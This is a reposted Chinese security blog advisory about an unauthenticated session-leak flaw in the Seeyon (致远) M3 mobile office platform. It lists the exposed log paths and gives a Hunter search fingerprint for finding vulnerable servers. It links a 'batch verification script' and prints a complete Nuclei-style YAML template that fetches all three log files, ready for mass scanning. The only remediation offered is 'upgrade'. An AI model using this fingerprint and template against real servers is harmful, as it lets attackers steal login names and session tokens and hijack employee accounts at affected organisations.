致远OA移动智能办公平台存在Session敏感信息泄露漏洞

admin 2024年5月7日15:46:37评论83 views字数 2137阅读7分7秒阅读模式
 

01—漏洞描述

     致远M3移动办公是致远互联打造的一站式智能工作平台,提供全方位的企业移动业务管理,致力于构建以人为中心的智能化移动应用场景,促进人员工作积极性和创造力,提升企业效率和效能,是为企业量身定制的移动智慧协同平台。在致远M3 server以下日志文件允许未授权访问泄露登陆用户名及session等敏感信息。

02—系统指纹

鹰图:web.icon=="657d4895205951cbea6396701b194c30"

03—产品主页

致远OA移动智能办公平台存在Session敏感信息泄露漏洞

04—漏洞复现

/mobile_portal/logs/autoLogin.log/mobile_portal/logs/app.log/mobile_portal/logs/requset.log

致远OA移动智能办公平台存在Session敏感信息泄露漏洞

致远OA移动智能办公平台存在Session敏感信息泄露漏洞

致远OA移动智能办公平台存在Session敏感信息泄露漏洞

05—修复建议

升级系统版本

06—批量验证脚本

https://pan.baidu.com/s/10MADh61DlidZCRHsSvTKbw

id: zhiyuan

info:
  name: 致远OA移动智能办公平台存在Session敏感信息泄露漏洞
  author: Husky
  severity: high

requests:
  - raw:
      - |
        GET /mobile_portal/logs/requset.log HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        If-None-Match: W/"18980125-1715050188489"
        If-Modified-Since: Tue, 07 May 2024 02:49:48 GMT
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
        Accept-Language: zh-CN,zh;q=0.9

      - |
        GET /mobile_portal/logs/app.log HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        If-None-Match: W/"18980125-1715050188489"
        If-Modified-Since: Tue, 07 May 2024 02:49:48 GMT
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
        Accept-Language: zh-CN,zh;q=0.9

      - |
        GET /mobile_portal/logs/autoLogin.log HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        If-None-Match: W/"18980125-1715050188489"
        If-Modified-Since: Tue, 07 May 2024 02:49:48 GMT
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
        Accept-Language: zh-CN,zh;q=0.9

    matchers:
      - type: dsl
        dsl:
          - status_code==200
          - status_code==200
          - status_code==200

# Enhanced by mp on 2024/05/07
致远OA移动智能办公平台存在Session敏感信息泄露漏洞

 

原文始发于微信公众号(如棠安全):【漏洞复现】致远OA移动智能办公平台存在Session敏感信息泄露漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月7日15:46:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   致远OA移动智能办公平台存在Session敏感信息泄露漏洞https://cn-sec.com/archives/2715099.html

发表评论

匿名网友 填写信息